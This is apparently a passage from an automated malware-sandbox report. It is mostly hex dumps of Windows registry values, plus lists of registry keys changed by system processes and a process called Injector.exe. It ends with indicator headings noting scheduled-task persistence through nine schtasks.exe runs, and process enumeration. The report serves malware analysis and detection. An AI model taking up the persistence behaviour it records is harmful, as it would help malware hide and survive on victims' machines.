140000000700000001000100050000001400000050003a005c00480066007200650066005c004e0071007a00760061005c004e006300630051006e0067006e005c005900620070006e0079005c005a00760070006500620066006200730067005c00420061007200510065007600690072005c00420061007200510065007600690072002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f50100000000000000000000e8070a00420061007200510065007600690072000a00410062006700200066007600740061007200710020007600610000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000088724671af18db0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff75ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff82ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff83ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings Injector.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\PastIconsStream = 1400000005000000010001000200000014000000494c200602000400440010001000ffffffff2110ffffffffffffffff424d360000000000000036000000280000001000000040000000010020000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000ff00000060000000000000000000000020000000b0000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff00000060000000200000000000000020000000f00d0d0df09d9d9dffc8c8c8ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff000000603f3f3f66000000ff00000060000000900a0a0af0c0c0c0ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660e2e2e2ff474747eb000000d0000000e04c4c4cee999999ff939393eeb1b1b1f0e0e0e0ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660c8c8c8f7adadadf6858585ff000000ff000000ff737373ff999999ff999999ff999999ff999999ffa0a0a0e8868686ff000000ff000000606d6d6d88aaaaaaebb2b2b2ffb2b2b2ff7a7a7aff000000ff000000ff696969ff999999ff999999ff999999ff999999ff5f5f5fff000000ff0000006045454571b2b2b2ffb2b2b2ffb2b2b2ffa7a7a7ff1b1b1be8000000c0000000b0080808f08f8f8fff999999ff999999ff5f5f5fff000000ff00000060303030607f7f7fff7b7b7bf67e7e7ee2525252e20a0a0af0000000f00000003000000020000000f0101010eb5a5a5af6505050ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff676767ff000000ff000000b000000020000000000000000000000020000000b0000000ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff777777ff080808f0000000d0000000000000000000000000000000000000000000000060000000ff00000060000000602c2c2ceb5f5f5fff5f5f5fff3f3f3fee080808f0000000f0000000300000000000000000000000000000000000000000000000a0000000600000000000000050000000b0000000f0000000ff000000f0000000a000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000ff00000060000000000000000000000020000000b0000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff00000060000000200000000000000020000000f00d0d0df09d9d9dffc8c8c8ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff000000603f3f3f66000000ff00000060000000900a0a0af0c0c0c0ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660e2e2e2ff474747eb000000d0000000e04c4c4cee999999ff939393eeb1b1b1f0e0e0e0ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660c8c8c8f7adadadf6858585ff000000ff000000ff737373ff999999ff999999ff999999ff999999ffa0a0a0e8868686ff000000ff000000606d6d6d88aaaaaaebb2b2b2ffb2b2b2ff7a7a7aff000000ff000000ff696969ff999999ff999999ff999999ff999999ff5f5f5fff000000ff0000006045454571b2b2b2ffb2b2b2ffb2b2b2ffa7a7a7ff1b1b1be8000000c0000000b0080808f08f8f8fff999999ff999999ff5f5f5fff000000ff00000060303030607f7f7fff7b7b7bf67e7e7ee2525252e20a0a0af0000000f00000003000000020000000f0101010eb5a5a5af6505050ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff676767ff000000ff000000b000000020000000000000000000000020000000b0000000ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff777777ff080808f0000000d0000000000000000000000000000000000000000000000060000000ff00000060000000602c2c2ceb5f5f5fff5f5f5fff3f3f3fee080808f0000000f0000000300000000000000000000000000000000000000000000000a0000000600000000000000050000000b0000000f0000000ff000000f0000000a000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000424d3e000000000000003e0000002800000010000000400000000100010000000000000100000000000000000000000000000000000000000000ffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffff0000fff90000fff10000800100000000000000000000000000000000000000000000000000000001000080070000c0070000c80f0000ffff0000ffff0000ffff0000fff90000fff10000800100000000000000000000000000000000000000000000000000000001000080070000c0070000c80f0000ffff0000ffff000000000000000000000000000000000000000000000000010000000800000002000000040000002400000001000000000000000100000000000000 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "165" SearchHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "13779" SearchHost.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\MuiCache SearchHost.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total SearchHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "132" SearchHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "13779" SearchHost.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify explorer.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHo = 6801000088020000 explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix SearchHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" SearchHost.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com SearchHost.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\bing.com SearchHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "3351" SearchHost.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "132" SearchHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "7361" SearchHost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" SearchHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "3384" SearchHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "16998" SearchHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "12426" SearchHost.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings dwm.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2584844841-1405471295-1760131749-1000\{6B417292-569B-4B1B-A812-3688A2977337} explorer.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage SearchHost.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DomStorageState SearchHost.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total SearchHost.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\MuiCache StartMenuExperienceHost.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage SearchHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "7361" SearchHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "15645" SearchHost.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com SearchHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "165" SearchHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133727754330492280" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1048 reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 9 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1864 schtasks.exe 2120 schtasks.exe 4400 schtasks.exe 5028 schtasks.exe 1328 schtasks.exe 1696 schtasks.exe 2804 schtasks.exe 4220 schtasks.exe 4796 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
